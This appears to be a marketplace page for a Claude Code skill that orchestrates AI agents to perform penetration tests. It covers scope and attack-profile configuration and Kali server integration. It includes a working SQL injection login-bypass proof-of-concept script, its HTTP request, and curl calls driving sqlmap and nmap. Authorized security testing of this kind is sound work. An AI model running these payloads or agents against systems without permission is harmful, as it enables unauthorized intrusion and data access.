claude-pentest-framework

AI-driven penetration testing framework for Claude Code with 15 agents, 6 skill coordinators, and 63 attack categories coordinated through structured engagement workflows
Skill file

Preview skill file↓↑
---
name: claude-pentest-framework
description: AI-driven penetration testing framework for Claude Code with 15 agents, 6 skill coordinators, and 63 attack categories coordinated through structured engagement workflows
triggers:
  - run a penetration test with Claude
  - set up offensive security testing with AI
  - configure a pentest engagement scope
  - launch automated security assessment
  - connect Kali Linux server for pentesting
  - coordinate AI pentest agents
  - define attack profile for security testing
  - execute structured vulnerability assessment
---

# claude-pentest Framework

> Skill by [ara.so](https://ara.so) — Security Skills collection.

claude-pentest is a comprehensive penetration testing framework for Claude Code that coordinates 15 specialized agents across 6 skill domains and 63 attack categories. It provides structured, human-in-the-loop, evidence-driven security assessments with automatic PoC generation, HTTP evidence capture, and Playwright screenshots.

## Core Concepts

**Agent Coordination Framework**: Unlike traditional scanners, claude-pentest orchestrates specialized executor agents following a strict 4-phase workflow (reconnaissance → planning → approval → execution → escalation).

**Human-in-the-Loop**: Every exploitation attempt requires explicit operator approval. Claude cannot proceed to active exploitation without confirmation.

**Evidence-First**: All findings include working PoCs (`poc.py`), captured output (`poc_output.txt`), HTTP evidence, and screenshots. No theoretical findings.

**Structured Outputs**: Machine-readable JSON + markdown analysis written to `outputs/{engagement}/`.

## Installation

### Add Marketplace Repository

```bash
# Inside Claude Code
/plugin marketplace add Stickman230/claude-pentest
```

### Install Plugin

```bash
# Inside Claude Code
/plugin install pentest@claude-pentest
```

The plugin installs to `.claude/` in your project directory. All agents, skills, and slash commands become available immediately.

### Optional: Kali Server (MKS)

For server-side testing (nmap, sqlmap, gobuster, Metasploit), deploy [MCP-Kali-Server](https://github.com/Wh0am123/MCP-Kali-Server) on a Kali Linux host:

```bash
# On Kali Linux
git clone https://github.com/Wh0am123/MCP-Kali-Server
cd MCP-Kali-Server
# Follow MCP-Kali-Server setup instructions

# In Claude Code
/pentest:pentest-kali
# Enter server URL: http://192.168.1.10:5000
```

## Key Commands

### Launch Full Engagement

```bash
/pentest:pentest
```

**Flow**:
1. Isolate session to pentest plugin (recommended)
2. Configure scope (target, engagement name, out-of-scope, time budget, auth, thoroughness)
3. Select attack profile (Full / Web app / API & cloud / Custom)
4. Configure Kali server integration (optional)
5. Review engagement summary
6. Execute: pre-flight → recon → planning → approval → executor deployment → time-budget loop → report

**Session Isolation**: When enabled, Claude constrains itself to pentest plugin agents only, preventing interference from other plugins.

### Define Scope

```bash
/pentest:pentest-scope
```

Configure or update engagement scope without launching. Writes `.pentest-scope.json`:

```json
{
  "target": "https://demo.testfire.net",
  "engagement_name": "altoro-mutual-pentest",
  "out_of_scope": "*.testfire.net/admin, production databases",
  "time_budget": "2 hours",
  "auth": "username: jsmith, password: demo1234",
  "thoroughness": "Medium",
  "output_formats": ["json", "markdown", "csv"],
  "status": "pending"
}
```

**Thoroughness Levels**:
- **Light**: Quick scan, common vulnerabilities only
- **Medium**: Standard pentest, broad coverage
- **Deep**: Extended testing, edge cases
- **Full**: Comprehensive, maximum time investment

### Define Attack Profile

```bash
/pentest:pentest-attacks
```

Select which attack categories to cover. Writes `.pentest-attacks.json`:

```json
{
  "mode": "web_application",
  "selected_categories": [
    "injection",
    "client_side",
    "authentication",
    "api_security",
    "business_logic"
  ],
  "skill_coordinators": [
    "injection-coordinator",
    "client-side-coordinator",
    "auth-coordinator"
  ],
  "executors": [
    "sql-injection-agent",
    "xss-agent",
    "auth-bypass-agent"
  ],
  "status": "pending"
}
```

**Attack Profiles**:
- **Full suite**: All 63 categories (12 domains)
- **Web application**: Injection, client-side, server-side, authentication, API, business logic
- **API & cloud**: API security, cloud containers, IP infrastructure, CVE testing, domain recon
- **Custom**: Multi-select from all categories

### Connect Kali Server

```bash
/pentest:pentest-kali
```

Configures remote Metasploit-Kali Server integration. Writes `.pentest-mks.json`:

```json
{
  "server_url": "http://192.168.1.10:5000",
  "status": "active",
  "tools_available": {
    "nmap": true,
    "gobuster": true,
    "dirb": true,
    "nikto": true,
    "sqlmap": true,
    "hydra": true,
    "john": true,
    "metasploit": true
  },
  "verified_at": "2026-06-08T14:30:00Z"
}
```

**Tool Endpoints** (when MKS active):
```bash
# nmap scan via MKS
curl -X POST http://192.168.1.10:5000/nmap \
  -H "Content-Type: application/json" \
  -d '{"target": "192.168.1.20", "options": "-sV -sC"}'

# sqlmap via MKS
curl -X POST http://192.168.1.10:5000/sqlmap \
  -H "Content-Type: application/json" \
  -d '{"url": "http://target.com/api?id=1", "options": "--risk=2 --level=2"}'
```

### Exit Engagement

```bash
/pentest:pentest-exit
```

**Flow**:
1. Read findings from `outputs/{engagement}/findings/`
2. Flush unsaved notes to disk
3. Output severity-bucketed summary (Critical/High/Medium/Low/Info)
4. Reset `.pentest-scope.json` and `.pentest-attacks.json` to `status: pending`
5. Lift session isolation
6. Prompt to run `/clear`

## Session State Files

Three JSON files at project root persist configuration:

| File | Purpose | Written By |
|------|---------|-----------|
| `.pentest-scope.json` | Target, timing, thoroughness | `/pentest:pentest-scope`, `/pentest:pentest` |
| `.pentest-attacks.json` | Attack categories, skill mapping | `/pentest:pentest-attacks`, `/pentest:pentest` |
| `.pentest-mks.json` | Kali server URL, tool availability | `/pentest:pentest-kali` |

## Agent Architecture

### 15 Executor Agents

Each follows 4-phase workflow:

1. **Reconnaissance**: Passive information gathering
2. **Planning**: Attack vector identification
3. **Approval**: Human-in-the-loop confirmation
4. **Execution**: Active exploitation with PoC generation

**Specialized Agents**:
- `sql-injection-agent`: SQL injection testing (error-based, blind, time-based)
- `xss-agent`: XSS testing (reflected, stored, DOM-based)
- `xxe-agent`: XML External Entity exploitation
- `ssrf-agent`: Server-Side Request Forgery
- `auth-bypass-agent`: Authentication mechanism testing
- `api-security-agent`: REST/GraphQL endpoint testing
- `cloud-security-agent`: Cloud misconfiguration detection
- `cve-agent`: Known vulnerability exploitation

### 6 Skill Coordinators

Coordinate related executors:

- `injection-coordinator`: SQL, NoSQL, LDAP, command injection
- `client-side-coordinator`: XSS, CSRF, clickjacking, CORS
- `server-side-coordinator`: XXE, SSRF, file upload, deserialization
- `auth-coordinator`: Broken auth, session management, crypto
- `api-coordinator`: API security, GraphQL, WebSocket
- `infra-coordinator`: Network, cloud, CVE, domain recon

## Output Structure

```
outputs/
└── {engagement_name}/
    ├── findings/
    │   ├── finding_001_sql_injection.json
    │   ├── finding_001_poc.py
    │   ├── finding_001_poc_output.txt
    │   ├── finding_001_screenshot.png
    │   └── finding_001_http_evidence.txt
    ├── processed/
    │   ├── findings/
    │   └── analysis.json
    ├── pentest-report.json
    └── report.md
```

### Finding Schema

```json
{
  "finding_id": "001",
  "title": "SQL Injection in Login Form",
  "severity": "Critical",
  "cvss_score": 9.8,
  "attack_category": "injection",
  "agent": "sql-injection-agent",
  "target_url": "https://demo.testfire.net/login.jsp",
  "vulnerable_parameter": "uid",
  "attack_vector": "' OR '1'='1' --",
  "impact": "Full database access, authentication bypass",
  "poc_file": "finding_001_poc.py",
  "poc_output_file": "finding_001_poc_output.txt",
  "screenshot_file": "finding_001_screenshot.png",
  "http_evidence_file": "finding_001_http_evidence.txt",
  "remediation": "Use parameterized queries, input validation",
  "references": ["CWE-89", "OWASP A03:2021"],
  "verified_at": "2026-06-08T14:45:00Z"
}
```

## Common Patterns

### Quick Web App Pentest

```bash
# Define scope
/pentest:pentest-scope
# Enter:
# - Target: https://demo.testfire.net
# - Engagement name: altoro-quick
# - Out-of-scope: None
# - Time budget: 1 hour
# - Auth: None
# - Thoroughness: Medium
# - Formats: json, markdown

# Use web app profile (skip attack selection)
/pentest:pentest
# Select: Use Web Application profile when prompted
```

### API Pentest with Kali Server

```bash
# Connect Kali first
/pentest:pentest-kali
# Enter: http://192.168.1.10:5000

# Define scope
/pentest:pentest-scope
# Target: https://api.example.com/v1
# Thoroughness: Deep

# Select API profile
/pentest:pentest-attacks
# Mode: API & cloud profile

# Launch
/pentest:pentest
```

### Custom Attack Surface

```bash
# Define specific categories
/pentest:pentest-attacks
# Mode: Custom
# Select: SQL injection, SSRF, XXE, authentication bypass

/pentest:pentest
```

### Reuse Saved Configuration

```bash
# Scope and attacks already defined in previous session
/pentest:pentest
# Responds: "Found existing scope (.pentest-scope.json)"
# Select: Reuse existing scope
# Responds: "Found existing attack profile (.pentest-attacks.json)"
# Select: Use saved profile
```

## Time Budget and Escalation

The engagement operates within a **time budget** (quota) defined in scope. The orchestrator:

1. Allocates budget across recon, executor deployment, and escalation phases
2. Runs **time-budget loop** for escalation after initial findings
3. Deploys Metasploit via MKS for post-exploitation **only if** CVE/RCE confirmed
4. Never runs speculative exploitation

**Example Time Budget Allocation** (2 hour total):
- Pre-flight: 5 minutes
- Recon: 20 minutes
- Planning: 10 minutes
- Executor deployment: 60 minutes (parallel)
- Time-budget loop (escalation): 20 minutes
- Report generation: 5 minutes

## Configuration Examples

### Authenticated Testing

```json
{
  "target": "https://app.example.com",
  "auth": "Bearer token: $AUTH_TOKEN (stored in env), cookie: session_id=$SESSION_ID",
  "thoroughness": "Deep"
}
```

Reference environment variables instead of hardcoding:

```python
# In PoC scripts
import os

AUTH_TOKEN = os.environ.get("AUTH_TOKEN")
SESSION_ID = os.environ.get("SESSION_ID")

headers = {
    "Authorization": f"Bearer {AUTH_TOKEN}",
    "Cookie": f"session_id={SESSION_ID}"
}
```

### Multi-Target Scope

```json
{
  "target": "https://app.example.com, https://api.example.com, 192.168.1.0/24",
  "out_of_scope": "192.168.1.1 (gateway), *.example.com/admin",
  "time_budget": "4 hours"
}
```

### API-Specific Configuration

```json
{
  "target": "https://api.example.com/v1",
  "auth": "API key: $API_KEY (header: X-API-Key)",
  "selected_categories": [
    "api_security",
    "injection",
    "authentication",
    "business_logic"
  ]
}
```

## Evidence Files

### PoC Script Example

`finding_001_poc.py`:
```python
#!/usr/bin/env python3
import requests
import os

TARGET_URL = "https://demo.testfire.net/login.jsp"
PAYLOAD = "' OR '1'='1' --"

def exploit():
    data = {
        "uid": PAYLOAD,
        "passw": "anything"
    }
    
    response = requests.post(TARGET_URL, data=data)
    
    if "Welcome" in response.text and response.status_code == 200:
        print("[+] SQL Injection successful")
        print(f"[+] Authentication bypassed with payload: {PAYLOAD}")
        return True
    else:
        print("[-] Exploitation failed")
        return False

if __name__ == "__main__":
    exploit()
```

### HTTP Evidence Format

`finding_001_http_evidence.txt`:
```
=== REQUEST ===
POST /login.jsp HTTP/1.1
Host: demo.testfire.net
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

uid=' OR '1'='1' --&passw=anything

=== RESPONSE ===
HTTP/1.1 200 OK
Content-Type: text/html
Set-Cookie: AltoroAccounts=...

<!DOCTYPE html>
<html>
<body>
<h1>Welcome, Admin</h1>
...
```

## Troubleshooting

### Engagement Won't Start

**Symptom**: `/pentest:pentest` fails at pre-flight check.

**Solution**: Verify target is reachable:
```bash
curl -I https://target.example.com
```

Check `.pentest-scope.json` for valid target format.

### Kali Server Connection Failed

**Symptom**: MKS tools unavailable, falling back to local bash.

**Solution**: Test MKS connectivity:
```bash
curl http://192.168.1.10:5000/health
```

Verify firewall rules allow connection. Re-run `/pentest:pentest-kali`.

### Missing Findings

**Symptom**: Engagement completes but `outputs/{name}/findings/` is empty.

**Solution**: Check thoroughness level (Light may produce fewer findings). Review time budget allocation. Examine `outputs/{name}/processed/analysis.json` for agent logs.

### PoC Scripts Fail

**Symptom**: `poc.py` returns errors when executed manually.

**Solution**: Install dependencies:
```bash
pip install requests playwright
python -m playwright install
```

Verify environment variables are set:
```bash
export AUTH_TOKEN="your_token"
export SESSION_ID="your_session"
```

### Agent Timeout

**Symptom**: Executor agents timeout during deployment.

**Solution**: Increase time budget in scope. Reduce thoroughness level. Disable MKS if network latency is high.

### Session Isolation Not Lifted

**Symptom**: After `/pentest:pentest-exit`, other plugins still unavailable.

**Solution**: Run `/clear` to fully reset context:
```bash
/clear
```

## Attack Coverage

**12 Attack Domains**:
1. **Injection**: SQL, NoSQL, LDAP, OS command, SSTI, log injection
2. **Client-Side**: XSS, CSRF, clickjacking, CORS, DOM clobbering
3. **Server-Side**: XXE, SSRF, file upload, deserialization, path traversal
4. **Authentication**: Broken auth, session management, weak crypto
5. **API Security**: REST, GraphQL, WebSocket, API key exposure
6. **Business Logic**: Workflow bypass, race conditions, price manipulation
7. **Access Control**: IDOR, privilege escalation, missing function-level access control
8. **Configuration**: Security misconfiguration, default credentials, verbose errors
9. **Cloud & Containers**: S3 buckets, Docker, Kubernetes, cloud metadata
10. **IP Infrastructure**: Network scanning, service enumeration, SSL/TLS
11. **CVE Testing**: Known vulnerabilities, version detection, patch validation
12. **Domain Recon**: DNS enumeration, subdomain discovery, certificate transparency

**63 Sub-Categories** mapped to specific executor agents and skill coordinators.

## Legal and Ethical Use

**ALWAYS obtain written permission before testing any system you do not own.**

claude-pentest is designed for:
- Authorized penetration testing engagements
- Bug bounty programs (within scope)
- Security research in controlled environments
- Red team exercises with proper authorization

**Unauthorized use is illegal and unethical.**

## Integration with Claude Code

The framework is designed to work within Claude Code's agent harness:

- **One level of subagent nesting**: `/pentest:pentest` orchestrates from main session
- **Slash command discovery**: Commands auto-register with Claude Code
- **Session isolation**: Prevents plugin interference during active engagements
- **Context window management**: `/clear` recommended between engagements

When active, claude-pentest coordinates all testing activities through structured workflows, ensuring evidence capture, human approval gates, and organized output for every finding.
Source

Creator's repository · aradotso/security-skills
View on GitHub ↗
Security

Security checks in progress
Results will appear here once audits complete
Checked by 3 independent security firms
Does it try to trick the AI?Not yet checkedPending · Gen Agent Trust Hub
Does it sneak in hidden code?Not yet checkedPending · Socket
Does it have known bugs?Not yet checkedPending · Snyk